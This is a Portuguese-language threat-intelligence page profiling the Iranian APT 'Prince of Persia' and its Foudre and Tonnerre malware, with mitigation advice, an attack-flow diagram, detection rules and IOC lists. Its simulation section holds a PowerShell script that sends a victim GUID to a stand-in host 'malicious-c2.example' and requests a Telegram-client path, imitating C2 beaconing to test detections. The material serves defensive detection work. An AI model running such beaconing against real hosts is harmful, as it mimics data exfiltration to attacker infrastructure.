Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório perfila o cluster APT ligado ao estado iraniano denominado Príncipe da Pérsia e traça sua progressão ao longo da última década, com ênfase em atividades observadas de 2023 a 2025. Os operadores dependem de famílias de malware personalizadas — incluindo Foudre, Tonnerre, MaxPinner, Rugissement e Deep Freeze — para suportar espionagem e roubo sistemático de dados. Iterações recentes introduzem algoritmos de geração de domínio, comando e controle baseados no Telegram e cargas SFX criptografadas para melhorar a resiliência e o ocultamento. O alvo abrange infraestrutura crítica e redes ligadas a dissidentes em várias regiões.
Investigação
Pesquisadores da SafeBreach seguiram as operações do grupo a partir de 2019, coletando amostras recentes, documentando a arquitetura C2 e analisando a lógica DGA. Eles descriptografaram cargas protegidas, extraíram credenciais de bots do Telegram e construíram uma linha do tempo das variantes lançadas. A pesquisa destaca infraestruturas de produção e teste separadas e detém detalhes de comportamentos de entrega de arquivos ligados a cadeias de infecção conduzidas por Excel. Indicadores de comprometimento foram montados a partir de hashes de malware, domínios e URLs.
Mitigação
Monitore a atividade DNS para os padrões DGA identificados, bloqueie domínios maliciosos conhecidos e restrinja ou inspecione o tráfego relacionado a bots do Telegram. Adicione detecções para os nomes de arquivos de malware mencionados e artefatos DLL de carregamento, e use monitoramento/sinkholing de DNS para expor infraestruturas rotativas. Implemente listas de permissão de aplicativos e fortaleça a segurança do Office limitando macros para reduzir a probabilidade de acesso inicial.
Resposta
Se qualquer indicador for encontrado, coloque o sistema afetado em quarentena, capture provas voláteis e execute forense direcionado em arquivos soltos e caminhos relevantes do registro. Bloqueie todos os domínios e endereços IP associados, gire tokens de bots do Telegram expostos e redefina credenciais para contas impactadas. Procure, em todo o ambiente, por remanescentes de DLL de carregador personalizado e cargas SFX criptografadas para garantir a erradicação completa.
“graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef tool fill:#ffe699 classDef file fill:#ccffcc classDef process fill:#ffdddd classDef operator fill:#ff9900 %% Node definitions action_initial[“<b>Ação</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Vítima recebe anexo Excel malicioso”] class action_initial action file_excel[“<b>Arquivo</b> – Excel malicioso com macro<br/>Lança ccupdate.tmp”] class file_excel file malware_foudre[“<b>Malware</b> – Foudre (ccupdate.tmp)<br/>Payload SFX criptografado”] class malware_foudre malware process_macro[“<b>Processo</b> – Execução de macro”] class process_macro process action_execution[“<b>Ação</b> – <b>T1204.002 Execução pelo Usuário: Arquivo Malicioso</b><br/>Vítima abre o Excel”] class action_execution action action_obfuscation[“<b>Ação</b> – <b>T1027.009 Payloads Embutidos</b><br/>Payload criptografado e camuflado”] class action_obfuscation action file_camDLL[“<b>Arquivo</b> – DLL disfarçada como vídeo MP4”] class file_camDLL file action_deobfuscate[“<b>Ação</b> – <b>T1140 Desofuscar/Decodificar Arquivos</b><br/>Descriptografa payload com senha embutida”] class action_deobfuscate action process_decrypt[“<b>Processo</b> – Rotina de descriptografia”] class process_decrypt process action_dga[“<b>Ação</b> – <b>T1568.002 Resolução Dinâmica (DGA)</b><br/>Gera domínios LOS1, FTS1, u2026”] class action_dga action process_dga[“<b>Processo</b> – Algoritmo de geração de domínio”] class process_dga process action_webc2[“<b>Ação</b> – <b>T1102.002 Comunicação Bidirecional via Serviço Web</b><br/>HTTP GET com GUID, versão, informações do usuário”] class action_webc2 action process_http[“<b>Processo</b> – Solicitação/resposta HTTP”] class process_http process action_telegram[“<b>Ação</b> – Uso de Bot do Telegram para C2”] class action_telegram action file_tga[“<b>Arquivo</b> – tga.adr (cliente do bot do Telegram)”] class file_tga file process_telegram[“<b>Processo</b> – Comunica-se via API do Telegram usando token de bot”] class process_telegram process action_exfil[“<b>Ação</b> – <b>T1041 Exfiltração Através do Canal C2</b><br/>Faz upload de arquivos roubados para diretórios C2”] class action_exfil action file_exfil[“<b>Arquivo</b> – Nomes de arquivos codificados, conteúdo criptografado”] class file_exfil file action_data_obfusc[“<b>Ação</b> – <b>T1001 Ofuscação de Dados</b><br/>Armazena dados exfiltrados com nomes codificados e criptografia”] class action_data_obfusc action %% Connections showing flow action_initial u002du002d>|delivers| file_excel file_excel u002du002d>|drops| malware_foudre malware_foudre u002du002d>|executes via| process_macro process_macro u002du002d>|leads to| action_execution action_execution u002du002d>|triggers| action_obfuscation action_obfuscation u002du002d>|uses| file_camDLL action_obfuscation u002du002d>|leads to| action_deobfuscate action_deobfuscate u002du002d>|runs| process_decrypt process_decrypt u002du002d>|produces| malware_foudre malware_foudre u002du002d>|initiates| action_dga action_dga u002du002d>|runs| process_dga process_dga u002du002d>|resolves to| action_webc2 action_webc2 u002du002d>|uses| process_http process_http u002du002d>|downloads| file_tga file_tga u002du002d>|enables| action_telegram action_telegram u002du002d>|uses| process_telegram process_telegram u002du002d>|exfiltrates via| action_exfil action_exfil u002du002d>|stores as| file_exfil file_exfil u002du002d>|applies| action_data_obfusc “
Fluxo de Ataque
Detecções
Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)
Ver
Possível Infiltroção/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Ver
Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Ver
Execução de Taskkill Suspeita (via cmdline)
Ver
IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 2
Ver
IOCs (SourceIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 1
Ver
IOCs (HashMd5) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
IOCs (DestinationIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
Detecção de Infecção Foudre v34 via Arquivo Excel com Executável Embutido [Criação de Processo no Windows]
Ver
Detecção de Comunicação C2 de Foudre e Tonnerre [Conexão de Rede no Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Telemetria & Linha de Base Pré-Voo deve ter sido aprovada.
Racional: Esta seção detalha a execução precisa da técnica do adversário (T1584.005) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos do Ataque:
O ator de ameaça provisionou um domínio maliciosomalicious-c2.exampleque hospeda o servidor C2 Foudre/Tonnerre. A carga útil do atacante na máquina da vítima realiza duas solicitações HTTP GET:- Envia o GUID da vítima para o endpoint Foudre C2 usando o caminho
/1/?c=<GUID>. - Contata a API do Telegram via backdoor Tonnerre usando o caminho
/t/tga.adr.
Ambas as requisições são feitas via HTTP (para simplificar o registro de proxy) e incluem um User-Agent genérico para mesclar com o tráfego normal. As ações geram os campos exatos (
request_method=GET,urlcontendo as substrings alvo) que a regra Sigma procura. - Envia o GUID da vítima para o endpoint Foudre C2 usando o caminho
-
Script de Teste de Regressão:
# ------------------------------------------------------------ # Simulação de Comunicação C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Defina o GUID da vítima (em uma infecção real, isso seria lido do registro) $guid = (New-Guid).Guid # 2. Defina o host C2 malicioso (substitua por um endereço que você controle para testes) $c2Host = "http://malicious-c2.example" # 3. Envie GUID para o endpoint Foudre C2 $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Enviando GUID para Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Contate a API do Telegram via backdoor Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Contatando endpoint da API do Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulação completa. Verifique o SIEM para alertas."O script é autocontido; executá-lo em um host Windows que encaminha tráfego através do proxy configurado produzirá duas entradas de log que correspondem às condições da regra Sigma
url|containscondições. -
Comandos de Limpeza:
# Remova quaisquer conexões de rede temporárias (só relevante se o proxy criar sessões persistentes) # Aqui simplesmente limpamos o cache DNS para evitar a resolução prolongada do host malicioso. ipconfig /flushdns Write-Host "[*] Limpeza completa."